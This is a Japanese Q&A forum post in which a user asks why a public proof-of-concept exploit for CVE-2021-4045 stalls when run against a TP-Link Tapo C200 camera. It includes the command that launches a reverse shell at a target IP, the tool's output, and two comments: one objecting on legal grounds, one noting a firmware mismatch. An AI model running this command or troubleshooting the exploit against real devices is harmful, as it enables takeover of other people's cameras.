# IPカメラへのexploitをしたい

Tags: python, security

以下の動画を参考にtapo c200 v1に対してexploitを実行したいと考えています。

[Exploitdb-TP-Link Tapo c200 1.1.15 - リモートコード実行 (YouTube)](https://www.youtube.com/watch?v=bbFcML90b5Y)

動画とは異なりますがgithubの方から使うコードはダウンロードしてきており、いつでも実行できるようにしています。
ですが、いざしてみるとずっと実行されたままで、c200のシェルに接続することができませんでした。

```
python3 pwntapo.py shell 192.168.11.12 172.21.175.92

  CVE-2021-4045 PoC  _   @hacefresko
 _ ____      ___ __ | |_ __ _ _ __   ___
| '_ \ \ /\ / / '_ \| __/ _` | '_ \ / _ \
| |_) \ V  V /| | | | || (_| | |_) | (_) |
| .__/ \_/\_/ |_| |_|\__\__,_| .__/ \___/
|_|                          |_|

[+] Listening on port 1337...
[+] Sending reverse shell to 192.168.11.12...
```

ここで止まってしまいます。
ブラウザの方でアクセスしてみると

```
このサイトにアクセスできません192.168.11.12 で接続が拒否されました。
次をお試しください

接続を確認する
プロキシとファイアウォールを確認する
ERR_CONNECTION_REFUSED
```

となってしまいました。
最初にアクセスすると　bad url request のような文字列が出てきてその後このような画面になりました。

どうにかしてexploitを実行することはできないでしょうか？

実行環境は

- Windows上でWSL(Ububtu)
- Hyper-V上のCentOS7
- Windows上のPython

どれでもダメでした（そりゃそうですが、、、、）

exploitをしたい機器は
tapo c200 v1 ファームウェアは1.0.6でした。
よろしくお願いいたします。

Comment: 自前の機器に対する攻撃方法を教えろ、ってことは要するにその辺に転がっているであろう同一機器に対して犯罪する方法を教えろってことだから、なんちゃら幇助になりそうです。そんなのに答える人っているのかな？少なくともオイラは絶対に嫌。

Comment: 説明では "1.1.15 以前" となっていますが、一方で CVE でテストしたのは "Tested on: 1.1.11, 1.1.14 and 1.1.15" と記載があり、あなたが試した 1.0.6 で動作するのかが不明です。まずはこの部分のバージョンを合わせるところからじゃないでしょうか。